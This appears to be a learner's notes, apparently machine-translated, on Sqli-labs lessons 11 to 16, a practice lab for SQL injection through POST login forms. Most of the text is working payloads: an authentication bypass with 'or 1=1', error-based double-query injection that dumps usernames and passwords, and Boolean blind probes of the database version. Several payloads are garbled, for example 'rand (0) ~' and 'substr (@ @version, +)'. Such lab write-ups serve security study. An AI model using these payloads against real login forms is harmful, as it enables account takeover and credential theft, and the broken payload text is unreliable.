Learn Sqli-labs notes, the notes in front of the content more detailed. The following only records the key points.
Less11:post injection, there is echo, there are error hints
From 11 onwards it was post injection and found two input boxes. Use Firefox's F12 to view the submission parameters as
uname=1&passwd=1&submit=submit
and uname on the test.
uname='&passwd=1&submit=submit
Error: You have aerror in your SQL syntax; check the manual, corresponds to your MySQL server version for the RI Ght syntax to use near "and password=" LIMIT 0,1 ' at line 1
Description statement format for where a= ' abc ' format
Finally, the login is bypassed by a perpetual statement:
uname=' or 1=1 limit 1,1--a&passwd=&submit=submit
LESS12:
Almost the same as the 11 question, that is, the closed way becomes ("xxx")
uname=") or 1=1 limit--A&passwd=&submit=submit
Less13:post injection, no echo, error
With LESS5 double injection, pay attention to the closure can
uname=') union (SELECT COUNT (*), concat (@ @version, floor (rand (0) ~)) A from Information_ Schema.tables GROUP by a)--A&passwd=&submit=submit
Get User name password
uname=') union (SELECT COUNT (*), concat ((select Concat (username,'/' ) , password) from the users limit 0,1), floor (rand (0) *)) A from Information_schema.tables group by a)--a&passwd=&s Ubmit=submit
LESS14:
Almost the same as the 13 question, only the closed way becomes "a"
uname=" Union (SELECT COUNT (*), concat ((select concat (username, '/', password) from users limit 0,1 ), Floor (rand (0) *)) A from Information_schema.tables group by a)--A&passwd=&submit=submit
Less15:post Injection, Boolean blind
Depending on the success of the login and the failure of the login, the results are different, and the blind test can be continued. Like the following statement, you need to try one character at a character.
uname=' or length (@ @version) >10--A&passwd=&submit=submit
uname=' or ASCII (substr (@ @version, +)) >64--A&passwd=&submit=submit
I'm really tired of trying.
LESS16:
The same as the root 15, is the closure of the way changed (PS: The name is called the time blind, but feel completely useless AH)
uname=") or ASCII (substr (@ @version, +)) >0--A&passwd=&submit=submit
"Sqli-labs" Less11~less16